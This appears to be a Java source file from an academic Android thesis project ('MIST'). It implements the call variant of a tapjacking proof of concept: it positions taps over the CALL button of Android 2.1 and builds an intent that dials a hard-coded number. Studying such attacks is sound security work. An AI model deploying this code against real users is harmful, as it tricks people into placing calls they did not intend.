package com.mist.types;

import android.content.Intent;
import android.graphics.Point;
import android.net.Uri;

import com.mist.Tapjacking;
/**
 * Projecte MIST
 * 
 * Treball de final de carrera. Ingenieria Tcnica en Informtica de Sistemes
 * Universitat Oberta de Catalunay
 * 
 * @Author UOC
 * @version Android 1.6, 2.1, 2.2
 */
public class TypeCall extends Tapjacking{

	//Punto encima del botn CALL en Android 2.1
	public static Point pointCall = new Point(190, 640);
		
	public TypeCall(int velocity) {
		super.createPoints(pointCall, velocity);
	}

	/**
	 * Funci que retorna un Intent ja construit
	 * Es un Intent per fer una trucada
	 */
	@Override
	public Intent getIntent() {
		Intent intent = new Intent(Intent.ACTION_VIEW);
		intent.setData(Uri.parse("tel://666999666"));
		intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
		return intent;
	}

	@Override
	public int getSleep() {
		return 1000;
	}
}
